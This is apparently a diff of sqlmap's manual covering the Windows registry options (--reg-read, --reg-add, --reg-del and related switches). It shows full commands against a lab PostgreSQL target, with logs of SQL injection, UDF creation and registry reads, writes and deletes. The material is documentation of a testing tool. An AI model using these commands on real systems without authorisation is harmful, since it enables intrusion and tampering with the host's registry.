It is possible to access Windows registry when the back-end +database management system is either MySQL, PostgreSQL or +Microsoft SQL Server, and when the underlying database layer +supports stacked SQL queries. Also, session user has to have +the needed privileges to access it.
+Option: --reg-read
TODO
+Using this option you can read registry key values.
+Example on a PostgreSQL 8.4 target:
++
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
-Write a Windows registry key value data
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
+
+[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:15] [INFO] retrieved: 8.4.2,
+[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:23] [INFO] testing if current user is DBA
+[hh:mm:23] [INFO] retrieved: 1
+[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
+[hh:mm:23] [INFO] retrieved: 0
+[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:24] [INFO] retrieved: 0
+[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
+[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
+CurrentVersion]
+which registry key value do you want to read? [ProductName]
+[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
+Windows NT\CurrentVersion\ProductName'
+[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP
+Registry key value data: 'ProductName REG_SZ Microsoft Windows XP'
+
+Option: --reg-add
TODO
+Using this option you can write registry key values.
+Example on a PostgreSQL 8.4 target:
++
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
-Delete a Windows registry key value
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
+
+[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:20] [INFO] retrieved: 8.4.2,
+[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:29] [INFO] retrieved: 1
+[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:30] [INFO] testing if current user is DBA
+[hh:mm:30] [INFO] retrieved: 1
+[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:30] [INFO] retrieved: 0
+[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
+which registry key value do you want to write? Test
+which registry key value data do you want to write? 1
+which registry key value data-type is it? [REG_SZ] REG_DWORD
+[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
+with data '1'. This will work only if the user running the database process has privileges
+to modify the Windows registry.
+
+Option: --reg-del
TODO
+Using this option you can delete registry keys.
+ +Example on a PostgreSQL 8.4 target:
++
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
+
+[...]
+web server operating system: Windows
+web application technology: PHP 5.3.1, Apache 2.2.14
+back-end DBMS: PostgreSQL
+
+[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:20] [INFO] retrieved: 8.4.2,
+[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:29] [INFO] retrieved: 1
+[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:30] [INFO] testing if current user is DBA
+[hh:mm:30] [INFO] retrieved: 1
+[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
+[hh:mm:30] [INFO] retrieved: 0
+[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
+which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
+which registry key value do you want to delete? Test
+are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
+sqlmap\Test? [y/N] y
+[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'.
+This will work only if the user running the database process has privileges to modify the
+Windows registry.
+
+Option: --reg-key
Options: --reg-key, --reg-value,
+--reg-data and --reg-type
TODO
+These switches can be used to provide data needed for proper running of
+options --reg-read, --reg-add and
+--reg-del. So, instead of providing registry key
+information when asked, you can use them at command prompt as program
+arguments.
With --reg-key option you specify used windows
+registry key path, with --reg-value value item
+name inside provided key, with --reg-data value
+data, while with --reg-type option you specify
+type of the value item.
Option: --reg-value
TODO
- - -Option: --reg-data
TODO
- - -Option: --reg-type
TODO
- +So, another way of running example from option
+--reg-add could be:
+
+
+$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \
+ --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
+
+